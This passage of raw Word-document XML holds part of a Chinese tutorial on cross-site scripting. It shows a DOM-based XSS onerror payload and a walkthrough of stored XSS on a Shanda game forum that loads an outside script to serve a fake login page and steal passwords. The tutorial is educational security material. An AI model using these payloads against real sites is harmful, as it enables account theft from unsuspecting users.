            <wp:docPr id="53" name="图片 8" descr="http://up.2cto.com/2012/1223/201212231224159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up.2cto.com/2012/1223/20121223122415945.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4271645" cy="2136140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>4</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当用户输入完百度</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>LOGO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的地址，点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>按钮后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>按钮的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>onclick</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>事件会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>xsstest()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>函数。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>xsstest()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>函数会获取用户提交的地址，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>将页面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>节点进行修改，把用户提交的数据以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码的形式写入页面中并进行展示。以上例子中输出的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“&lt;img src=” http://www.baidu.com/img/baidu_sylogo1.gif”&gt;&lt;/img&gt;”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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lastRenderedPageBreak/>
        <w:t>以上情况为正常的用户输入情况，那黑客又是怎么利用该种类型代码实现</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跨站脚本攻击的呢？黑客可以通过构造如下数据，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“#’ onerror=’javascript:alert(/DOM Based XSS Test/)”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，在浏览器中提交后，发现代码果然被执行，出现了弹窗提示，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4537710" cy="2961640"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="图片 9" descr="http://up.2cto.com/2012/1223/2012122312241539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up.2cto.com/2012/1223/20121223122415398.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId260" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4537710" cy="2961640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>5</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击实例</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以上是针对</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跨站脚本攻击三种类型的简单介绍。看了上面的描述朋友们或许会想，难道仅仅弹出一个提示框就是</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跨站脚本攻击了吗？答案当然是否定的，</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跨站脚本攻击的利用可以实现多种效果，甚至可以说</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跨站脚本攻击漏洞的利用是一种黑客攻击的艺术，下面我们结合具体实例进行详细的分析和描述，了解一下</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跨站脚本攻击都能做些什么事情。</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击利用钓鱼</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目前，网络钓鱼攻击的方式比较多，包括申请注册相似域名，构建相似度高的网站环境和发布虚假中奖信息等，但是以上钓鱼攻击方式针对有一定安全意识的网民来说，很难实现成功的钓鱼攻击。然而通过</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跨站脚本攻击漏洞进行的钓鱼攻击，即使有一定安全意识的网民，也无法抵御。这里我们以盛大游戏论坛的</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跨站脚本攻击漏洞利用的钓鱼攻击演示（目前，该漏洞已经修复）。首先，我们需要了解的是，盛大的游戏登录都是使用盛大通行证进行登录的，而盛大的游戏论坛也是使用盛大通行证进行登录，所以，如果黑客通过盗取游戏玩家登录论坛时的信息，就相当于盗取了玩家游戏账号和密码。盛大的游戏论坛就存在</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跨站脚本攻击漏洞，使得黑客可以通过该漏洞获取用户的账号和密码。存在过滤不严的位置为用户资料中的个人主页部分，通过在个人主页栏中输入如下代码：</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[url]http://'' STYLE='a:expression(document.write("&lt;s\143ript language=javas\143ript src=http://up.2cto.com/2012/1223/20121223122415564.jpg Charset=GB23&gt;&lt;/s\143ript&gt;"))' target=_blank[/url]</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然后利用该账号在论坛中发帖子或回复，这样当其他玩家访问我们发布或回复的帖子时，就会执行我们插入的恶意代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>http://up.2cto.com/2012/1223/20121223122415564.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>就是我们构造的恶意代码，这个代码是我们用来钓鱼的页面，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5136766" cy="4728950"/>
            <wp:effectExtent l="19050" t="0" r="6734" b="0"/>
            <wp:docPr id="51" name="图片 10" descr="http://up.2cto.com/2012/1223/201212231224204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up.2cto.com/2012/1223/20121223122420405.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId261" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5136756" cy="4728941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>6</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显示的内容和盛大官方游戏论坛登录的页面一样，如果不通过查看网页源代码的方式是无法从页面显示中看出任何问题的，当玩家输入通行证账号和密码信息并点击登录时，账号提交的地址不是盛大的服务器，而是黑客的服务器。从源码中，可以看到账号和密码发送到的黑客服务器账号接收程序的地址，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="1160145"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="图片 11" descr="http://up.2cto.com/2012/1223/201212231224208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up.2cto.com/2012/1223/20121223122420891.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
